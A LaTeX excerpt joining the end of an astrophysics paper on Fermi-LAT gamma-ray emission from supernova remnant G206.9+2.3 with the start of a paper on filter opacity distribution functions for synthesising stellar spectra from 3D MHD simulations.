We found that the photon flux of the global fit is (1.19$\pm$0.59)$\times$ 10$^{-9}$ ph cm$^{-2}$ s$^{-1}$, and its spectral index is $2.22\pm 0.19$.
Each energy bin of its SED was fitted separately using the binned-likelihood method.
For the energy bin with a TS value $>$ 4, using the bracketing Aeff method\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/Aeff{\_}Systematics.html}, we calculated the systematic uncertainties from the effective area. For the energy bin with a TS value $<$ 4, we assigned an upper limit with a 95\% confidence level, as shown in Figure \ref{Fig4}. The best-fit results for each bin are presented in Table \ref{table3}.
\begin{table}[!h]
\begin{center}
\caption{The best-fit results of each energy bin of SNR G206.9+2.3}
\begin{tabular}{lcclclclc}
\hline\noalign{\smallskip}
E & Band & $E^{2}dN(E)/dE$ & TS \\
(GeV) & (GeV) & ($10^{-13}$erg cm$^{2}s^{-1}$ ) & \\
\hline\noalign{\smallskip}
0.53 & 0.2-1.41 & 9.29 & 0.0 \\
3.76 & 1.41-10.00 & 4.00$\pm$1.56$^{+0.19}_{-0.21}$ & 7.45 \\
26.59 & 10.00-70.71 & 2.81$\pm$1.63$^{+0.62}_{-0.19}$ & 4.66 \\
188.03 & 70.71-500 & 3.84 & 0.0 \\
\noalign{\smallskip}\hline
\end{tabular}
\label{table3}
\end{center}
\textbf{Note}:
Two uncertainties from the second and the third energy fluxes are statistical and systematic ones, respectively.
Other energy fluxes were the upper limits, with a 95\% confidence level.
\end{table}
\begin{figure}[!h]
\centering
\includegraphics[width=\textwidth, angle=0, scale=0.6]{fig8.pdf}
\caption{The blue data points are from this work.
TS values of above 4 are presented using a gray shaded region.
The black solid line is the best-fit result of a power-law model, and the two red dashed lines are its 1$\sigma$ statistical uncertainties.
The 95\% upper limits are provided for data points with TS value $<$ 4.
}
\label{Fig4}
\end{figure}
\subsection{Variability Analysis}
To decrease the pollution from the galactic diffuse background in the lower energy band, we chose an energy range of 0.5-500 GeV to generate a light curve (LC) with 10 time bins from the region of SNR G206.9+2.3, as shown in Figure \ref{Fig5}. Subsequently, we calculated the value of $\rm TS_{var}$, as the variability index defined by \citet{Nolan2012}. We found $\rm TS_{var} $ to be approximately equal to 24.42, but greater than 21.67, which suggested that the LC of this SNR exhibits weak variability with a variability significance level of 2.90$\sigma$.
\begin{figure}[!h]
\centering
\includegraphics[width=\textwidth, angle=0,width=150mm,height=80mm]{LC10.pdf} %
\caption{Panel comprises 12.4 years of the LC with 10 time bins for SNR G272.2-3.2 in the 0.5-500 GeV band.
The upper limits of the 95\% confidence level are calculated for the time bins of TS values $<$ 4. The TS values are represented by gray shaded areas for the time bins with TS values $>$ 4.
}
\label{Fig5}
\end{figure}
\section{discussion and conclusion}
\begin{table*}[!h]
\caption{The fit Parameters of Leptonic and Hadronic Models}
\begin{center}
\begin{tabular}{lcccccc}
\hline\noalign{\smallskip}
Model Name & $n_{\rm gas}$ & $\alpha$ & $E_{\rm cutoff}$ & $W_{\rm e}$ (or $W_{\rm p}$) \\
& (cm$^{-3}$) & & (TeV) & (erg) & \\
\hline\noalign{\smallskip}
Leptonic model & --- & 1.50 & 0.76 & 1.04$\times 10^{47}$ \\
\noalign{\smallskip}\hline
Hadronic model & 0.1 & 2.30 & 11.82 & 1.13 $\times 10^{50}$ \\
\hline\noalign{\smallskip}
\end{tabular}
\end{center}
\label{Table4}
Note: Here, for the distance and gas density of SNR G206.9+2.3, we assumed 2.2 kpc and 0.1 cm$^{-3}$ from \citet{Ambrocio-Cruz2014}, respectively. The energy band of the particles $>$ 1 GeV was selected to calculate the values of $W_{\rm e}$ and $W_{\rm p}$.
\end{table*}
In the beginning, we found that this $\gamma$-ray emission retained TS values$>$9 in different energy bands after reducing $\gamma$-ray contamination from surrounding significant residual radiations, so we suggested it was a real GeV $\gamma$-ray source. Then we found that the new $\gamma$-ray source was from the location of SNR G206.9+2.3;
the GeV region of SNR G206.9+2.3 coincides with the radio region from the Effelsberg 100-m telescope.
Using the simulation of the uniform disk model, we found
its photon flux to be $\rm (3.68\pm 1.21)\times 10^{-10}$ $\rm cm^{-2} s^{-1}$ with a spectral index of $2.22\pm 0.19$ in the 0.2-500 GeV energy band, and the value of the spectral index is close to the average value of 2.15 of 43 SNRs and SNR candidates in 4FGL \citep{4FGL}.
In addition, we studied the spectral properties of other high-energy bands, and we found that the higher the energy band, the softer is the spectral index, as shown in Table \ref{table2}.
For the elderly SNR G206.9+2.3, its particles inside may be in a late stage of evolution. At this stage, as the SNR shock wave continues to slow down, the high-energy particles inside will lose most of their energies through radiation, which makes its GeV spectrum likely present a soft property in the energy range of E$>$1 GeV \citep{Cox1972,Blondin1998,Brantseg2013}.
In addition, compared with other elderly SNRs, e.g., IC 443, W 44, W 51C, their ages are also above 10000 years, and the $\gamma$-ray spectrum also showed the soft property \citep{Guo2017}, and the spectral property of SNR G206.9+2.3 is similar to these of elderly SNRs currently observed.
\citet{Tang2013} and \citet{Zeng2019} summarized the relationship between spectral cut-off energy ($E_{\rm cut-off}$) and SNR age. The $E_{\rm cut-off}$ will gradually decrease above 10$^{4}$ yr, which means that the high-energy photons inside SNR will gradually cool. Therefore, the cooling of the internal particles likely makes the current SNR G206.9+2.3 in a weak state, with a low photon flux and TS value.
Next, we studied its 12.4 years of LC; we found a weak variability with a variability significance level of 2.90$\sigma$. As shown in Figure \ref{Fig5}, we found that the TS values of the third and the ninth bins were higher than those of the other bins. Subsequently, we immediately investigated other likely GeV candidates within the 2$\sigma$ error circle by SIMBAD, especially for common active galactic nuclei (AGN) or ANG candidates, but we did not find a likely candidate. Therefore, we thought the weak variability of this LC likely originated from SNR G206.9+2.3 itself, similar to the newly discovered Supernova 2004dj \citep{Xi2020a,Ajello2020}.
Leptonic and hadronic origins are widely used to explain the GeV $\gamma$-ray radiation of SNRs in the Milky Way \citep[e.g.,][]{Zeng2017,Zeng2019}.
The former is generally considered to be caused by the inverse Compton scattering, and the latter is mainly owing to the decay of the neutral pion $\pi^{0}$ from the process of inelastic proton-proton collisions.
For the hadronic origin, OH (1720 MHz) maser emission is considered to be convincing evidence for verifying the interaction of SNRs with OH molecular clouds. However, \citet{Frail1996} did not find significant OH maser emission from the SNR G206.9+2.3 region.
In addition, \citet{Su2017b} made detailed observations of the CO molecular cloud around this SNR with the 13.7 m millimeter-wavelength telescope of the Purple Mountain Observatory.
Although they did not find a wide CO molecular line from this region, this SNR was located in a molecular cavity at approximately 15 km s$^{-1}$; a certain number of CO molecular clouds were distributed around it, which implied a likely association between the surrounding CO molecular gas and the SNR.
\begin{figure}[!h]
\centering
\includegraphics[width=\textwidth, angle=0,width=90mm]{had_lep.pdf}
\caption{Fit results of leptons and hadrons. The green solid line represents the hadronic origin from the process of inelastic proton-proton collisions. The red solid line represents the leptonic origin from the inverse Compton scattering.
}
\label{Fig6}
\end{figure}
Based on the aforementioned two kinds of origins, here we used a simple steady-state model provided by NAIMA \citep[][and references therein]{Zabalza2015} to explain its SED with the particle distribution of a power-law exponential cutoff, as was done by \citet{Xiang2021a}.
We found that these two types of origins can explain the GeV SED of SNR G206.9+2.3, as shown in Figure \ref{Fig6}. The relevant fitting parameters are presented in Table \ref{Table4}.
For the Leptonic fitting result, we found that an index of $\alpha$=1.5 was consistent with the average result of the four shell SNRs (including RX J1713.7-3946, RX J0852.0-4622, RCW 86, and HESS J1731-347; refer to \citet{Acero2015b}). Moreover, we found that particle electron energy budget $W_{\rm e}$($>$ 1 GeV) $\sim 10^{47}$ erg was in good agreement with that of \citet{Acero2015b}, which indicates that the observed radiation is probably of leptonic origin.
For the hadronic fitting result, we found that its index of $\alpha$=2.3 was consistent with the average result from SNRs with molecular cloud systems (SNR-MCs) (including IC 443, W 44, W 51C, W 49B, Puppis A; refer to \citet{Xiang2021a}). Furthermore, the proton energy budget ($W_{\rm p}$ $>$ 1 GeV) was in the range of 10$^{49} \sim 10^{50}$ erg of SNR-MCs from \citet{Xiang2021a}, which indicates that the hadronic origin of the radiation is also likely.
Based on the aforementioned analyses, we propose that the new $\gamma$-ray source is likely to be a counterpart of SNR G206.9+2.3.
More observational data from different wavebands are required to further reveal the origin of the $\gamma$-ray emission from the SNR G206.9+2.3 region in the future (e.g., continuous observations of Fermi-LAT).
\section{Acknowledgements}
We sincerely appreciate the support for this work from the National Key R\&D Program of China under Grant No.2018YFA0404204, the National Natural Science Foundation of China (NSFC U1931113, U1738211), the Foundations of Yunnan Province (2018IC059, 2018FY001(-003)), the Scientific research fund of Yunnan Education Department
(2020Y0039).
| 2024-02-18T23:40:19.587Z | 2021-05-21T02:06:54.000Z | algebraic_stack_train_0000 | 2,066 | 4,420 |
|
proofpile-arXiv_065-10209 | \section{Introduction}
\label{intro}
Accurate modelling of stellar spectra for stars with various effective temperatures, surface gravities, and elemental compositions is a key tool in stellar physics. In addition to these fundamental stellar parameters, the emergent spectrum is also affected by stellar magnetic activity. In particular, effects from magnetic activity might significantly complicate characterization of exoplanets and their atmospheres with transit photometry and spectroscopy. Thus, also modelling the impact of stellar surface magnetic fields on emerging stellar spectra have since recently came under the spotlight.
For a long time stellar spectra have been computed using one-dimensional (1D) atmospheric structures calculated under the assumption of radiative equilibrium \citep[with some models also including simple parameterizations of convective flux and overshooting, see, e.g.][]{Boehm_vitense_1964, Kurucz_2005_Atlas12_9, MARCS_descript2008,Phoenix_descript2013}. However, it has been shown that such 1D structures do not necessarily represent average properties of the real three-dimensional (3D) atmospheres \citep{1D_bad}.
Furthermore, 1D modelling does not allow self-consistently accounting for the effects of stellar surface magnetic field on the thermal structure of stellar atmospheres \citep[albeit the semi-empirical approach dates back to][but only applicable to stars with near-solar fundamental parameters]{1975SoPh...42...79S,vernazzaetal1981,1993SSRv...63....1S}. Consequently, while semi-empirical 1D models have been successfully used for simulating the effects of surface magnetic field on the solar spectrum \citep[see][for review]{MPS_AA, TOSCA2013} their extension to modelling magnetised atmospheres of other stars is not straightforward \citep[see, e.g.,][]{Veronika2018}.
The advent of powerful computers has made it possible to gradually replace 1D modelling with 3D hydrodynamic and magnetohydrodynamic (HD and MHD, respectively) simulations of the near-surface layers of the Sun and stars. Such simulations have reached a high level of realism \citep[see, e.g.,][]{1998ApJ...499..914S,2005A&A...429..335V,2017ApJ...834...10R,2011A&A...531A.154G,2012JCoPh.231..919F} and have been extensively tested against various solar observations. Using these simulations, the emergent spectra can then be calculated in the 1.5D regime, i.e., along many parallel rays passing through a 3D model. The resulting intensity along any particular direction is then calculated by combining the intensities along all the rays which together sample the whole simulation cube \citep[see][for detailed descriptions of the approach]{2012A&A...547A..46H, 2013A&A...558A..20H, rietmueller-solanki-2014, norris-beck-2017}.
One of the main hurdles in calculating spectra emerging from stellar atmospheres is the intricate wavelength dependence of the opacity brought about by millions of atomic and molecular lines. These lines dominate opacity in the ultra-violet (UV) and significantly contribute to the opacity in the visible spectral domain for cool stars like the Sun. Consequently, even though many applications require computations of the spectra with intermediate spectral resolutions (e.g., 10 {\rm {\AA}} or coarser) the spectrum must still be calculated on a grid with a very fine spectral resolution to catch all the relevant spectral features (since missing them would also affect the spectrum averaged to a coarse resolution). Such calculations on a fine spectral grid are computationally expensive, especially in the case of 1.5D calculations when spectra must be synthesised, sometimes along millions of rays.
One way to drastically reduce the computational time is to use Opacity Distribution Functions (ODFs) introduced by \citet[][]{1951ZA.....29..199L} \citep[see also][for detailed discussions on ODFs]{2014tsa..book.....H}. The ODFs method is based on a clever way of describing the opacity that significantly reduces the number of frequencies on which the radiative transfer (RT) equation is solved. In other words, the detailed frequency dependence of the opacity is replaced by a few points, which are representative of the entire opacity distribution.
ODFs have been extensively used and tested for 1D models of the solar atmosphere \citep[see e.g.,][]{1974ApJ...188L..21K,1979ApJS...40....1K, 2019A&A...627A.157C}.
Present computing resources allow direct (i.e., on a fine spectral grid) calculations of spectra with 1D models so that the ODFs method is rarely used in 1D modelling. At the same time direct calculations of emergent spectra are still not feasible over a broad spectral range for the 1.5D computations based on the output of 3D (M)HD simulations. Therefore, the transition from 1D to 3D (M)HD modelling of stellar atmospheres has rekindled the interest in the ODFs method.
There are, however, two shortcomings of the ODFs method which have to be addressed to make it a reliable tool for comprehensive modelling of stellar spectra. First, the applicability of the ODFs method for synthesising emerging spectra from 3D (M)HD cubes has never been tested. Second, the ODFs method allows calculating radiative intensity integrated in various spectral domains, which can be considered as spectral intensity passing through a filter with a transmission function that has a rectangular dependence on the wavelength (i.e., zero outside of the given spectral pass-band and a constant value within this pass-band). However, it does not allow calculating intensity passing through filters with non-rectangular dependence of the transmission function on the wavelength. At the same time, such calculations are needed, for example, to analyse solar observations in narrow band filters \citep[e.g., performed by the Sunrise balloon borne observatory, see][]{2010ApJ...723L.127S},
to model stellar colours \citep[which are measured in different narrow and broadband filters, see, e.g.,][for a comprehensive list]{Sun_in_filters}, to calculate limb darkening coefficients in the pass-band of planetary hunting telescopes (e.g., {\it Kepler}, TESS, and CHEOPS) as well as to model the impact of magnetic activity on stellar brightness measured by various ground- and space-based filter equipped telescopes. For such calculations the spectral pass-band has to be split in many small intervals where the spectral dependence of the transmission function can be neglected.
The large number of intervals, however, increases the number of frequencies at which spectral synthesis must be preformed and, thus, reduces the performance of the ODFs method.
In this study we eliminate both shortcomings. Firstly, we generalise the ODFs method for calculating intensities passing through filters with arbitrary transmission functions and present the filter-ODFs (hereafter, FODFs) method. For this purpose we limit ourselves to filters that are narrow enough that neither continuum opacity nor Planck function changes noticeably within the filter. Secondly we test the performance of the ODFs and FODFs methods on the exemplary case of solar 3D MHD simulations with the MURaM code \citep[Max Planck Institute/University of Chicago Radiative MHD, see][]{2005A&A...429..335V}. For the RT calculations we use the newly developed {\bf{M}}erged {\bf{P}}arallelised {\bf{S}}implified (MPS) - ATLAS code \citep{2020A&A_Witzke}. A preliminary study of the filter-ODFs method was performed by \citet[][]{2019A&A...627A.157C}, who demonstrated that the method is capable of accurately returning intensity in the Str\"{o}mgren {\it b} filter in the case of 1D semi-empirical models of the solar atmosphere \citep[FALC and FALP by][]{1993ApJ...406..319F}. Here we present a more detailed study based on 3D MHD simulations.
The paper is organized as follows. Section~\ref{method} gives a general overview of the ODFs method and presents the FODFs method, Section~\ref{results} presents the main
results of the paper, and Section~\ref{conclusions} summarises the conclusions where we discuss the applications and limitations of the ODFs/FODFs method.
\section{Methods}
\label{method}
\subsection{The (Filter) Opacity Distribution Functions}
\label{fodfs-method}
In this section we first recall the traditional ODFs method used for calculating radiative intensity passing through rectangular filters. Then we introduce the formalism of the FODFs method that we developed for calculating radiative intensities passing through an arbitrary filter.
Let us consider a wavelength interval $ [\lambda_1,\lambda_2] $ over which we would like to compute the total spectral intensity:
\begin{equation}
\label{eq:f}
f=\int_{\lambda_{1}}^{\lambda_{2}} I(\lambda) d\lambda.
\end{equation}
The most straight forward way of computing the integral in Equation~(\ref{eq:f}) is to calculate the emergent intensity on a fine grid of spectral points within the $ [\lambda_1,\lambda_2] $ interval (hereafter, spectral bin) and approximate $f$ by the quadrature $f_{\rm HR}$ (where ``HR'' stands for high resolution since the quadrature must be calculated on the high-resolution wavelength grid):
\begin{equation}
\label{eq:f_quadr}
f \approx f_{\rm HR} \equiv \sum\limits_{i=1}^{N} I(\lambda_i) \cdot \Delta \lambda,
\end{equation}
where $N$ is the number of points in a high resolution grid, which we assume to be equidistant, and $\Delta \lambda = (\lambda_2-\lambda_1) / (N-1)$ is one step on the grid.
Equation~(\ref{eq:f_quadr}) implies that, firstly, the opacities in a 1D atmosphere (or along a ray following the 1.5D approach) must be calculated at $N$ frequency points and, secondly, the formal solution of the RT equation must be performed $N$ times. A great simplification can be achieved by employing the Local-thermodynamic-equilibrium (LTE) approximation. Then the opacity at a given frequency only depends on the elemental composition, pressure, temperature, and turbulent velocity.
We note that here we approximate the detailed velocity profile by a scalar generally known as the micro-turbulence parameter which broadens the lines and enters opacity. Such an approximation does not allow one to accurately synthesise profiles of individual spectral lines but it is routinely applied for calculating intensities in various pass-bands \citep[see, e.g.,][]{norris-beck-2017, Yelles2020}.
Consequently, for a given elemental composition the opacity can be pre-tabulated and then interpolated for all the points in the stellar atmosphere. This avoids direct calculations of the opacity values on the fly and, dramatically reduces the computational cost.
Nevertheless, calculations with the quadrature method, especially over the broad frequency interval, can be very time-consuming. The main problem is that $N$ often must be a very large number to find a reasonable approximation of the integral $f$, so that one has to solve the RT equation many times. We illustrate this point in Figure~\ref{figure1} whose top panels show high-resolution opacity calculated with the MPS-ATLAS code (see below) under the condition of LTE for the temperature 4250 K and pressure 3.3$\times 10^4$ dyn/cm$^2$ (values close to those that can be met in the upper solar photosphere). One can see that
the opacity is fully dominated by the Fraunhofer lines in the UV spectral domain (left top panel of Figure~\ref{figure1}) and is strongly affected by lines in the visible (right top panel of Figure~\ref{figure1}). As a result the opacity has a highly complex spectral profile and can vary over many orders of magnitude within a very narrow spectral interval. The emergent spectra are plotted in the bottom panels of Figure~\ref{figure1}. They are calculated for one of the rays passing through the MHD cube representing the solar atmosphere (see below for more details). One can see that just like the opacity the spectra have a very rich structure. In particular, the numerous absorption lines in the UV so strongly overlap and blend each other that it even becomes impossible to identify the continuum level. All in all, Figure~\ref{figure1} illustrates that one needs a very fine frequency grid (i.e., up to a thousand points) to catch all spectral details shown in middle and bottom panels of Figure~\ref{figure1} to accurately calculate the integrated intensity in the shown spectral domains.
An alternative and much more time efficient approach compared to direct calculation of the quadrature $f_{\rm HR}$ is the ODFs method. This method sorts the frequency points in the high-resolution grid according to the value of opacity at some depth point in the atmosphere, i.e., to come up with a transformation $i \rightarrow M (i)$, which implies that the $i$-th grid point (with $1<i<N$) is replaced with the $M(i)$-th point (with $1<M(i)<N$). The main assumption of the ODFs method is that the transformation $M$ is the same for all depth points in the atmosphere contributing to the intensity in the bin $ [\lambda_1,\lambda_2] $. Under such an assumption Equation~(\ref{eq:f_quadr}) can be rewritten as
\begin{equation}
\label{eq:f_quadr_sort}
f_{\rm HR} = \sum\limits_{i=1}^{N} I(\lambda_{M(i)}) \cdot \Delta \lambda.
\end{equation}
There is a crucial difference between Equation~(\ref{eq:f_quadr}) and Equation~(\ref{eq:f_quadr_sort}) introduced by reordering terms in the summation.
Indeed, in Equation~(\ref{eq:f_quadr}) the term with index $i$ and those with indices close to $i$ can correspond to very different values of opacity and, consequently, be very different.
In contrast, in Equation~(\ref{eq:f_quadr_sort}) nearby terms, e.g., with indices $M(i)$,
$M(i-1)$, and $M(i+1)$,
should have similar values of opacity (according to the ODFs assumption that all depths points contribute to the intensity in the bin [$\lambda_1$, $\lambda_2$]) and emergent intensity.
Let us then rewrite Equation~(\ref{eq:f_quadr_sort}) splitting the entire sum into $s$ sub-sums with the $j$-th sub-sum containing $N_j$ grid points:
\begin{equation}
\label{eq:f_group}
f_{\rm HR} = \left ( \sum\limits_{i=1}^{N_1} I(\lambda_{M(i)}) +
\sum\limits_{i=N_1+1}^{N_1+N_2} I(\lambda_{M(i)}) +
\sum\limits_{i=N_1+N_2+1}^{N_1+N_2+N_3} I(\lambda_{M(i)}) +...+
\sum\limits_{i=N-N_s+1}^{N} I(\lambda_{M(i)}) \right ) \cdot \Delta \lambda .
\end{equation}
The opacity and intensity values for all points within individual sub-sums are close to each other. Thus, one can now substitute the intensity values in the sub-sums by the intensity calculated using opacity averaged over all the frequency points in the sub-sum, i.e.,
\begin{equation}
\label{eq:subbin}
f_{\rm HR} \approx f_{\rm ODFs} \equiv \sum\limits_{j=1}^{s} \widehat{I_j} \, \widehat{\Delta \lambda_j},
\end{equation}
where $\widehat{I_j}$ is calculated by solving the RT equation with opacity averaged (e.g., arithmetically or geometrically, see Section~\ref{results}) over the grid points within the sub-sum, and $\widehat{\Delta \lambda_j} = N_j \cdot \Delta \lambda$. The $s$ intervals are called sub-bins and the mean opacity in each of the sub-bins is called the ODF. Exactly as the high-resolution opacity values, the ODFs for a given chemical composition can be pre-tabulated as a function of temperature, pressure, and micro-turbulent velocity. Here $\widehat{I_j}$ is formulated to represent an Intensity Distribution Function associated with the ODF.
The first step towards moving from the ODFs to FODFs is a generalisation of Equations~(\ref{eq:f_group}--\ref{eq:subbin}) to a non-equidistant high-resolution spectral grid. Equation~(\ref{eq:f_group}) then becomes:
\begin{equation}
\label{eq:f_group_non}
f_{\rm HR} = \sum\limits_{i=1}^{N_1} I_{M(i)} \Delta \lambda_{M(i)}
+
\sum\limits_{i=N_1+1}^{N_1+N_2} I_{M(i)} \Delta \lambda_{M(i)} +
\sum\limits_{i=N_1+N_2+1}^{N_1+N_2+N_3} I_{M(i)} \Delta \lambda_{M(i)} +...+
\sum\limits_{i=N-N_s+1}^{N} I_{M(i)} \Delta \lambda_{M(i)} ,
\end{equation} where for simplicity we introduce a designation $I_{M(i)} \equiv I(\lambda_{M(i)}) $.
Each sub-sum in Equation~(\ref{eq:f_group_non}) can be written as $\bar{I}_j \times l_j$, a product of weighted mean of intensity (with weights being proportional to the steps of the wavelength grid) $\bar{I}_j=\sum I_{M(i)} \left ( \Delta \lambda_{M(i)} / l_j \right )$, and the width of the sub-bin $l_j = \sum \Delta \lambda_{M(i)}$. Here we also define the size of the $j$-th sub-bin as
\begin{equation}
\label{sub-bin-sizes}
s_j=l_j/(\lambda_2-\lambda_1).
\end{equation}
Then, exactly like in Equation~(\ref{eq:subbin}) the weighted mean of intensity $\bar{I}_j$ can be approximated by the intensity calculated with the weighted mean of opacity denoted as $\widehat{I}_j$. Most importantly, the utilised weights only depend on the high-resolution frequency grid, so that the weighted mean opacity in each of the sub-bins can be pre-calculated and pre-tabulated, and we now call them FODFs. Similar to the case of ODFs, here $\widehat{I_j}$ is formulated to represent an Intensity Distribution Function associated with the FODF. Hereafter for convenience these Intensity Distribution Functions are simply referred to as intensities computed using ODFs or FODFs.
All in all, the ODFs method implies approximation of the mean intensity in the sub-bin by intensity calculated with the mean opacity in the sub-bin. The accuracy of such an approximation strongly depends on the choice of the splitting in Equation~(\ref{eq:f_group}), which is a crucial aspect of the ODFs method. A proper choice implies that the intensity in the sub-bin should depend on the opacity in a roughly linear way. In particular, one should avoid situations when intensity strongly depends on the opacity in some part of the sub-bin but then saturates in another. As a result, the relative sizes of the sub-bins (defined in Equation~(\ref{sub-bin-sizes})) with large opacity values are usually chosen to be smaller than those with small opacity values. A detailed study of the optimal choice of the sub-bins was recently performed by \cite{2019A&A...627A.157C}.
Let us now consider the case when instead of calculating the total spectral intensity in the bin (or in other words, intensity passing through the rectangular filter) one needs to calculate intensity passing trough
a filter with some wavelength-dependant transparency $\phi=\phi(\lambda)$ (with $0 \le \phi \le 1$ ):
\begin{equation}
\label{eq:F}
F=\int_{\lambda_{1}}^{\lambda_{2}} I(\lambda) \, \phi(\lambda) \, d\lambda.
\end{equation}
Similar to Equation~(\ref{eq:f_quadr}) the
integral might be approximated by the quadrature:
\begin{equation}
\label{eq:F_quadr}
F \approx F_{\rm HR} \equiv \sum\limits_{i=1}^{N} I(\lambda_i) \, \phi(\lambda_i) \cdot \Delta \lambda,
\end{equation}
The most direct way of employing the ODFs method for calculating $F_{\rm HR}$ is to move the filter transmission function out of the summation in Equation~(\ref{eq:F_quadr}) and write the intensity as a product of the mean transmission value and intensity in the rectangular filter (which can then be approximated by $f_{\rm ODFs}$):
\begin{equation}
\label{eq:F_ODF}
F_{\rm HR} \approx F_{\rm ODFs} \equiv \left (\frac{1}{N} \sum\limits_{i=1}^{N} \phi(\lambda_i) \right ) \cdot f_{\rm ODFs},
\end{equation}
where $f_{\rm ODFs}$ is given by Equation~(\ref{eq:subbin}). An obvious advantage of such an approach is that it does not require any recalculations of ODFs, so that the same ODFs can be used for all filters. It is, however, clear that $F_{\rm ODFs}$ cannot be an accurate approximation of $F_{\rm HR} $ since it does not account for the distribution of spectral features within the filter.
A much more accurate way is to sort and split the terms in Equation~(\ref{eq:F_ODF}) exactly as done in Equations~(\ref{eq:f_group}) and (\ref{eq:f_group_non}). Then, in each of the sub-bins one can approximate the mean values of intensity weighted with the transmission function by intensity calculated with the corresponding weighted mean of opacity. The only disadvantage of such an approach is that the transmission function is bound to affect the optimal choice of the sub-binning, i.e., grouping of terms in Equations~(\ref{eq:f_group}) and (\ref{eq:f_group_non}). For example, it might happen that the largest opacity coincidentally corresponds to small values of the transmission function (i.e., a strong spectral line is located in the wings of the filter). Then it does not make sense to approximate the peak of the opacity distribution (i.e., highest values of the opacity) as accurately as one would do it in the case of the rectangular transmission function.
A simple way to overcome this problem is to transform a high-resolution
wavelength grid $\lambda_i$:
\begin{equation}
\label{eq:tilda}
\tilde{\lambda}_i=\Delta \lambda \, \sum\limits_{j=1}^{i} \phi(\lambda_j), \,\,\,\,\,\, \Delta \tilde{\lambda}_i = \Delta \lambda \, \phi(\lambda_i),
\end{equation}
where the transformation is for simplicity written for the case of an equidistant $\lambda_i$ grid.
Then Equation~(\ref{eq:F_quadr}) can be rewritten as
\begin{equation}
\label{eq:F_quadr_tilde}
F_{\rm HR} = \sum\limits_{i=1}^{N} I_i \, \Delta \tilde{\lambda}_i.
\end{equation}
Equation~(\ref{eq:F_quadr_tilde}) represents a quadrature with non-equidistant grid which can be adequately approximated by the ODFs sum similar to that in Equation~(\ref{eq:subbin}), but
written on the new $\tilde{\lambda}$ wavelength grid:
\begin{equation}
F_{\rm FODFs} \equiv \sum\limits_{j=1}^{s} \widehat{I_j} \,\widehat{ \Delta \tilde{\lambda_j}},
\end{equation}
where $F_{\rm FODFs}$ stands for intensity calculated with filter-ODFs (which is basically normal ODFs, but calculated on the new wavelength grid $\tilde{\lambda}$), $\widehat{I_j}$ is intensity computed with opacity averaged over the sub-bin with width $\widehat{ \Delta \tilde{\lambda_j}}$.
The most important benefit of transforming the
wavelength grid is that sizes of sub-bins ($s_j$ defined in Equation~(\ref{sub-bin-sizes})) can be taken the same as for the rectangular filter, e.g., one can directly use receipts proposed by \cite{2019A&A...627A.157C}. Furthermore, FODFs can be pre-calculated and tabulated for any given filter profile as a function of temperature, pressure and micro-turbulent velocity values exactly the same way the traditional ODFs are pre-tabulated.
We note here that dividing a given bin into sub-bins with equal or unequal widths is respectively termed uniform or non-uniform sub-binning.
For example, in the earlier formulations Kurucz used twelve non-uniform sub-bins per bin, such that the sub-bins containing largest values of the opacity are closely spaced \citep[see, e.g.,][]{1991ASIC..341..441K,Castelli_2005_DFSYNTHE}. Hereafter we refer to this particular sub-binning suggested by Kurucz, as the Kurucz-sub-binning (see also Table~\ref{tab:table2} and discussions in Section~\ref{results}).
The Kurucz sub-binning set-up of twelve non-uniform sub-bins per bin is used for most of our tests.
We stress here that the ODFs method is based on the assumption that transformation $i \rightarrow M (i)$ (see Equation~(\ref{eq:f_quadr_sort})) does not change within the region where radiation in a given bin forms. In other words, we assume that there is a unique correspondence between a given point in a sub-bin and the actual wavelength for all depths within the formation region. For instance, the wavelength of the point of maximum opacity in the given bin is the same at all depths.
The accuracy of the ODFs method diminishes if this assumption is not fulfilled, e.g., when maximum value of opacity corresponds to a certain wavelength for some depths, but to another wavelengths elsewhere. In Section~\ref{results} we compare the intensities computed using ODFs method and those computed using the high-resolution opacities and, thus, test the ODFs assumption.
\begin{table}[h!]
\begin{center}
\caption{Mean errors of $e_{\textrm {ODFs}}$ plotted in Figures~\ref{figure2} and \ref{figure3}.}
\label{tab:table1}
\begin{tabular}{c|c|c}
\textbf{UV: High-resolution vs.} & \textbf{UV: High-resolution vs.} & \textbf{UV: High-resolution vs.} \\
\textbf{ODF-1 bin} & \textbf{ODF-5 bin} & \textbf{ODF-20 bin} \\
\textrm{GM} & \textrm{GM} & \textrm{GM} \\
\hline
\hline
-1.22 \% & -1.07 \% & -1.14 \% \\
\hline
\hline
\textrm{AM} & \textrm{AM} & \textrm{AM} \\
\hline
\hline
-0.68 \% & -0.53 \% & -0.65 \% \\
\hline
\hline
\textbf{Visible: High-resolution vs.} & \textbf{Visible: High-resolution vs.} & \\
\textbf{ODF-1} & \textbf{ODF-5} & \\
\textrm{GM} & \textrm{GM} & \\
\hline
\hline
-0.18 \% & -0.19 \% & \\
\hline
\hline
\textrm{AM} & \textrm{AM} & \\
\hline
\hline
0.19 \% & 0.14 \% & \\
\hline
\hline
\end{tabular}
\end{center}
\end{table}
\begin{table}[h!]
\begin{center}
\caption{Sub-bin sizes $s_j$ (defined in Equation~(\ref{sub-bin-sizes})) used for the plots in Figure~\ref{figure4}.}
\label{tab:table2}
\begin{tabular}{l|c}
\textbf{Figure legend} & \textbf{Sub-bin sizes $s_j$} \\
\hline
\hline
nonuni-12 & \{0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.9833, 1.0\} \\
uni-12 & \{$8.3\times10^{-2}$, 0.166, 0.25, 0.333, 0.416, 0.5, 0.583, 0.666, 0.75, 0.837, 0.916, 1.0\}\\
uni-8 & \{0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875, 1.0\}\\
uni-4 & \{0.25, 0.5, 0.75, 1.0\}\\
nonuni-4a & \{0.32, 0.6, 0.8, 1.0\} \\
nonuni-4b & \{0.80, 0.92, 0.96, 1.0\}\\
nonuni-4c & \{0.76, 0.88, 0.94, 1.0\}\\
\hline
\hline
\end{tabular}
\end{center}
\end{table}
\begin{figure}
\includegraphics[scale=0.4]{f01.eps}
\includegraphics[scale=0.4]{f02.eps}
\caption{Top panels show high resolution opacities (black lines) in the UV and the visible pass-band over-plotted
with the continuum opacity (red lines) at a given depth point in the line formation region.
Bottom panels show high resolution emergent spectra (black lines). Also over-plotted are
the SuFI and SuFIV filter profiles (blue lines) in the respective spectral pass-bands.
}
\label{figure1}
\end{figure}
\subsection{Numerical setup}
\label{1.5D-RT}
